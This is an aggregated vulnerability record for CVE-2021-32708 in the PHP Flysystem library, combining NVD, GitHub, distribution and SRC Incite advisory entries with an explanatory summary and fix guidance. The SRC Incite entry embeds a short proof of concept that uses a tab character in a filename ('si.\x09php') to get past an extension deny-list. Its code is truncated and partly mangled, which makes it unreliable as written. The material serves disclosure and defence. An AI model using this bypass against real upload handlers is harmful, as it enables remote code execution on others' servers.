Flysystem is an open source file storage library for PHP. The path normalisation used in 1.x and 2.x (`Util::normalizePath` → `removeFunkyWhiteSpace`) strips characters matched by the `\p{C}` Unicode class — control and other non-printable code points, not only whitespace — from a supplied path. Because this stripping happens inside the library, after any extension check the calling application performed on the raw filename, a name such as `si.\x09php` has the extension `"\tphp"` at check time (absent from a deny-list) but is written to disk as `si.php`. Under certain specific conditions this allows a malicious user to execute code remotely. The conditions are: a user is allowed to supply the path or filename of an uploaded file; the supplied path or filename is not checked for non-printable/Unicode control characters; the supplied pathname is checked against an extension deny-list rather than an allow-list; the supplied path or filename contains such a character in the extension; and the uploaded file is stored in a directory from which the web server will execute PHP. When all of these hold, a user can upload and execute arbitrary code on the system under attack. Although the advisory is classified as CWE-367 (TOCTOU), the mechanism described is a check-then-transform mismatch (validation on the raw name, normalisation afterwards) rather than a timing race. Note also that NVD rates the CVSS v3.1 base score 8.1 (AC:H) while the CNA rated it 9.8 (AC:L); actual exposure depends entirely on whether the consuming application meets the conditions above. In the fixed versions the Unicode character removal has been replaced with a rejection (an exception is thrown). For 1.x users, upgrade to 1.1.4; for 2.x users, upgrade to 2.1.1. Independently of upgrading, applications should validate extensions with an allow-list applied to the final, normalised name, reject non-printable characters in user-supplied filenames, and store uploads outside any directory the web server treats as executable.
{"id": "CVE-2021-32708", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-32708", "description": "Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.", "published": "2021-06-24T17:15:00", "modified": "2021-09-20T18:50:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", 
"baseScore": 8.1, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32708", "reporter": "security-advisories@github.com", "references": ["https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32", "https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74", "https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm", "https://packagist.org/packages/league/flysystem", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWPTENBYKI2IG47GI4DHAACLNRLTWUR5/"], "cvelist": ["CVE-2021-32708"], "immutableFields": [], "lastseen": "2022-03-23T18:32:18", "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-32708"]}, {"type": "fedora", "idList": ["FEDORA:0479630ADA76", "FEDORA:E0B4F305D42D"]}, {"type": "github", "idList": ["GHSA-9F46-5R25-5WFM"]}, {"type": "osv", "idList": ["OSV:GHSA-9F46-5R25-5WFM"]}, {"type": "srcincite", "idList": ["SRC-2021-0021"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-32708"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-32708"]}, {"type": "fedora", "idList": ["FEDORA:0479630ADA76", "FEDORA:E0B4F305D42D"]}, {"type": "github", "idList": ["GHSA-9F46-5R25-5WFM"]}, {"type": "srcincite", "idList": ["SRC-2021-0021"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-32708"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "GitHub, Inc.", "cvss": {"3": {"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "score": 9.8}}}, "cpe": ["cpe:/o:fedoraproject:fedora:33", 
"cpe:/o:fedoraproject:fedora:34"], "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"], "cwe": ["CWE-367"], "affectedSoftware": [{"cpeName": "thephpleague:flysystem", "version": "1.1.4", "operator": "lt", "name": "thephpleague flysystem"}, {"cpeName": "thephpleague:flysystem", "version": "2.1.1", "operator": "lt", "name": "thephpleague flysystem"}, {"cpeName": "fedoraproject:fedora", "version": "33", "operator": "eq", "name": "fedoraproject fedora"}, {"cpeName": "fedoraproject:fedora", "version": "34", "operator": "eq", "name": "fedoraproject fedora"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:thephpleague:flysystem:1.1.4:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.1.4", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:thephpleague:flysystem:2.1.1:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.1", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32", "name": "https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74", "name": "https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": 
"https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm", "name": "https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm", "refsource": "CONFIRM", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://packagist.org/packages/league/flysystem", "name": "https://packagist.org/packages/league/flysystem", "refsource": "MISC", "tags": ["Product", "Third Party Advisory"]}, {"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/", "name": "FEDORA-2021-717516a2e9", "refsource": "FEDORA", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWPTENBYKI2IG47GI4DHAACLNRLTWUR5/", "name": "FEDORA-2021-b9187c535c", "refsource": "FEDORA", "tags": ["Mailing List", "Third Party Advisory"]}]}
{"github": [{"lastseen": "2022-04-19T19:30:00", "description": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. 
For 2.x users, upgrade to 2.1.1.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-29T03:13:28", "type": "github", "title": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2022-04-19T19:03:01", "id": "GHSA-9F46-5R25-5WFM", "href": "https://github.com/advisories/GHSA-9f46-5r25-5wfm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "srcincite": [{"lastseen": "2022-02-27T09:44:57", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of League flysystem. Authentication may not be required to exploit this vulnerability. The specific flaw exists within the removeFunkyWhiteSpace function. The issue results from a change in the supplied filename which can introduce a time-of-check time-of-use condition. 
An attacker can leverage this vulnerability to write arbitrary files on a target web server.\n\n**Affected Vendors:**\n\nLeague\n\n**Affected Products:**\n\nflysystem\n\n**Vendor Response:**\n\nLeague has issued an update to correct this vulnerability. More details can be found at: <https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm>\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "srcincite", "title": "SRC-2021-0021 : League flysystem removeFunkyWhiteSpace Time-Of-Check Time-Of-Use File Write Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-06-23T00:00:00", "id": "SRC-2021-0021", "href": "https://srcincite.io/advisories/src-2021-0021/", "sourceData": "assertAbsent($path);\r\n $config = $this->prepareConfig($config);\r\n\r\n Util::rewindStream($resource);\r\n return (bool) $this->getAdapter()->writeStream($path, $resource, $config);\r\n }\r\n\r\n public function assertAbsent($path)\r\n {\r\n if ($this->config->get('disable_asserts', false) === false && 
$this->has($path)) {\r\n throw new FileExistsException($path); // whoops\r\n }\r\n }\r\n```\r\n\r\nAt [1] the `normalizePath` method is called:\r\n\r\n```php\r\nclass Util\r\n{\r\n //...\r\n\r\n public static function normalizePath($path)\r\n {\r\n return static::normalizeRelativePath($path); // 2\r\n }\r\n\r\n public static function normalizeRelativePath($path)\r\n {\r\n $path = str_replace('\\\\', '/', $path);\r\n $path = static::removeFunkyWhiteSpace($path); // 3\r\n\r\n $parts = [];\r\n\r\n foreach (explode('/', $path) as $part) {\r\n switch ($part) {\r\n case '':\r\n case '.':\r\n break;\r\n\r\n case '..':\r\n if (empty($parts)) {\r\n throw new LogicException(\r\n 'Path is outside of the defined root, path: [' . $path . ']'\r\n );\r\n }\r\n array_pop($parts);\r\n break;\r\n\r\n default:\r\n $parts[] = $part;\r\n break;\r\n }\r\n }\r\n\r\n return implode('/', $parts);\r\n }\r\n```\r\n\r\nThe code calls `normalizeRelativePath` with the attackers supplied filename at [2] and then calls the `removeFunkyWhiteSpace` function at [3]. Let's investigate this function defined in the same class:\r\n\r\n```php\r\n protected static function removeFunkyWhiteSpace($path) {\r\n // We do this check in a loop, since removing invalid unicode characters\r\n // can lead to new characters being created.\r\n while (preg_match('#\\p{C}+|^\\./#u', $path)) {\r\n $path = preg_replace('#\\p{C}+|^\\./#u', '', $path);\r\n }\r\n\r\n return $path;\r\n }\r\n```\r\n\r\nIn summary the code is stripping the filename of any non-printable characters (invisible control characters and unused code points 0x00\u20130x1F and 0x7F\u20130x9F) which can be used to bypass block list checks. But definitely props for the .. check ;-)\r\n\r\n# Bonus:\r\n\r\nThe `assertAbsent` call will throw a `FileExistsException` which leaks the full path of the web root to an attacker if the same file is uploaded. 
You probably want to fix that information disclosure bug too.\r\n\r\n# Example:\r\n\r\nresearcher@neophyte:~$ php poc.php\r\n(+) vuln\r\n*/\r\n\r\nrequire __DIR__.'/vendor/autoload.php';\r\nif (file_exists(\"output/si.php\")) unlink(\"output/si.php\");\r\n\r\n$blocklist = [\r\n 'php',\r\n 'php3',\r\n 'php4',\r\n 'php5',\r\n 'phtml',\r\n 'cgi',\r\n 'pl',\r\n 'sh',\r\n 'com',\r\n 'bat',\r\n '',\r\n 'py',\r\n 'rb',\r\n];\r\n\r\n// this would be the attack coming from over the web\r\n$filename = \"si.\\x09php\";\r\n$d = pathinfo($filename);\r\nif (in_array($d[\"extension\"], $blocklist, true)) die(\"(-) blocked, nice try attacker!\\r\\n\");\r\n$adapter = new League\\Flysystem\\Local\\LocalFilesystemAdapter(__DIR__.'/output');\r\n$filesystem = new League\\Flysystem\\Filesystem($adapter);\r\n$str = \"writeStream($filename, $stream);\r\necho file_exists(\"output/si.php\") == true ? \"(+) vuln\\r\\n\" : \"(+) not vuln\\r\\n\";\r\n?>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://srcincite.io/pocs/src-2021-0021.php.txt"}], "osv": [{"lastseen": "2022-05-11T21:40:55", "description": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. 
Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. 
For 2.x users, upgrade to 2.1.1.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-29T03:13:28", "type": "osv", "title": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-09-21T14:55:38", "id": "OSV:GHSA-9F46-5R25-5WFM", "href": "https://osv.dev/vulnerability/GHSA-9f46-5r25-5wfm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-07-28T14:46:52", "description": "Flysystem is a filesystem abstraction which allows you to easily swap out a local filesystem for a remote one. 
Autoloader: /usr/share/php/League/Flysystem/autoload.php ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-04T01:09:20", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: php-league-flysystem-1.1.4-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-07-04T01:09:20", "id": "FEDORA:0479630ADA76", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:46:52", "description": "Flysystem is a filesystem abstraction which allows you to easily swap out a local filesystem for a remote one. 
Autoloader: /usr/share/php/League/Flysystem/autoload.php ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-04T01:08:10", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: php-league-flysystem-1.1.4-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-07-04T01:08:10", "id": "FEDORA:E0B4F305D42D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NWPTENBYKI2IG47GI4DHAACLNRLTWUR5/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-01-22T11:31:03", "description": "Flysystem is an open source file storage library for PHP. The whitespace\nnormalisation using in 1.x and 2.x removes any unicode whitespace. Under\ncertain specific conditions this could potentially allow a malicious user\nto execute code remotely. 
The conditions are: A user is allowed to supply\nthe path or filename of an uploaded file, the supplied path or filename is\nnot checked against unicode chars, the supplied pathname checked against an\nextension deny-list, not an allow-list, the supplied path or filename\ncontains a unicode whitespace char in the extension, the uploaded file is\nstored in a directory that allows PHP code to be executed. Given these\nconditions are met a user can upload and execute arbitrary code on the\nsystem under attack. The unicode whitespace removal has been replaced with\na rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users,\nupgrade to 2.1.1.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-24T00:00:00", "type": "ubuntucve", "title": "CVE-2021-32708", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-06-24T00:00:00", "id": "UB:CVE-2021-32708", "href": "https://ubuntu.com/security/CVE-2021-32708", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-07-04T06:01:38", "description": "Flysystem is an open 
source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-24T17:15:00", "type": "debiancve", "title": "CVE-2021-32708", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32708"], "modified": "2021-06-24T17:15:00", "id": 
"DEBIANCVE:CVE-2021-32708", "href": "https://security-tracker.debian.org/tracker/CVE-2021-32708", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}